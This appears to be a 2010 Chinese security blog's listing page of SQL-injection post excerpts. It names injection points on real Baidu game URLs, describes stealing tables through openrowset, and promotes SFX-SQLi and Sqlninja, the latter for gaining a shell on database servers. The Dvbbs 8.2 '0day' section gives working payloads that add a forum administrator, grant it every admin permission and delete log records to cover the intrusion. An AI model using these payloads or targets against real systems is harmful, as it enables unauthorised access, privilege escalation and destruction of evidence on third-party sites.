百度游戏的一些安全隐患

日期: 2010/05/15 分类: 技术杂文 标签: , , , 添加回复

作者:yesu (http://hi.baidu.com/3hack_yesu
1.注入点

http://yx.baidu.com/Hall/game/rank_fxq.asp?order=bean&page=2&sort=0&nick=

http://yx.baidu.com/down/down_game.asp?tn=1

阅读全文

比较有效率的openrowset读表方案

日期: 2010/05/15 分类: 技术杂文 标签: , 添加回复

Author: 二 月

文章没有什么亮点,主要是希望方便以及做个T-SQL游标使用的例子供大家参考。

假 设我们控制的SQL服务器叫X.X.X.X,我们注入一个目标,可以openrowset,对系统表有select权限

连接查询分析器建立 扩展储存:

阅读全文

SFX-SQLi version 1.1.3.22

日期: 2010/04/07 分类: 技术杂文 标签: , 4 个回复

SFX-SQLi (Select For XML SQL injection) is a new SQL injection technique which allows to extract the whole information of a Microsoft SQL Server 2005/2008 database in an extremely fast and efficient way.

This technique is based on the FOR XML clause, which is able to convert the content of a table into a single string, so its contents could be appended to some field injecting a subquery into a vulnerable input of a web applicatio
In addition to a new web application for testing, a new revision of the tool is published with some minor fixes and changes, including new functionality like access to other databases in the same server or support for user defined queries

Download source code and binaries from http://www.kachakil.com

Hacking Oracle from the Web

日期: 2010/02/24 分类: 技术杂文 标签: , 添加回复

Exploiting SQL Injection from Web Applications

This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database.

Download PDF

睛天电影系统注入漏洞

日期: 2010/01/26 分类: 技术杂文 标签: , , , 添加回复

睛天电影系统 Sql Injection Vulnerability 0day

Author: My5t3ry
Official site: http://www.qingtiandy.cn/
vulnerable: /look/template/wmv.asp

Code:
<%
IF Not ChkPost() Then
response.Redirect G_error_page_1
response.End()
End IF

阅读全文

Dvbbs 8.2 SQL injection 0day

日期: 2010/01/07 分类: 技术杂文 标签: , , 添加回复
SSV ID:15206
SEBUG-Appdir:动网(DVBBS)
发布时间:2009-12-31
影响版本:
Dvbbs 8.2
漏洞描述:
DVBBS是一款由WWW.ASPSKY.NET开发和维护的开放源码Asp论坛程序。
<*参考

暂无

*>

测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

发帖子,标题为下面的sql语句,然后点评论。0为中立, 1为支持, 2为反对 都行。
这时sql语句被执行
库名:a','',1,'akai','2008-2-4','',2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username='akai'--

复制代码加前台和后台管理员:a','',1,'akai','2008-2-4','',2);update dv_user set UserGroupID=1 where username='akai';insert into dv_admin(Username,Password,Flag,Adduser)values('akai','965eb72c92a549dd',',4,','akai')--

复制代码进入后台,通过注入再获取全部权限:http://www.xxx.com/Admin/help.asp?action=view&id=1;update/**/dv_admin/**/set/**/flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45'/**/where/**/username='akai'--

复制代码清理数据库记录(有三个表):http://www.xxx.com/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username='akai';delete/**/from/**/dv_topic/**/where/**/PostUsername='akai';delete/**/from/**/Dv_Appraise/**/where/**/UserName='akai'--

复制代码(因为是通过后台注入来执行delete语句,所以最后Dv_log还是有一条关于后台help.asp文件访问记录)
SEBUG安全建议:
暂无
请参考官方补丁
www.dvbbs.net
// sebug.net [2010-01-07]

在Ubuntu 9.04上安装Sqlninja

日期: 2009/09/17 分类: 技术杂文 标签: , , 添加回复

最近在找Linux下的Sql注入软件,以前只用过Sqlmap,今天尝试了一下Sqlninja,这款软件的简介:

Sqlninja’s goal is to exploit SQL injection vulnerabilities on web applications that use Microsoft SQL Server as back end. It is released under the GPLv2.

There are a lot of other SQL injection tools out there but sqlninja, instead of extracting the data, focuses on getting an interactive shell on the remote DB server and using it as a foothold in the target network. In a nutshell, here’s what it does:

阅读全文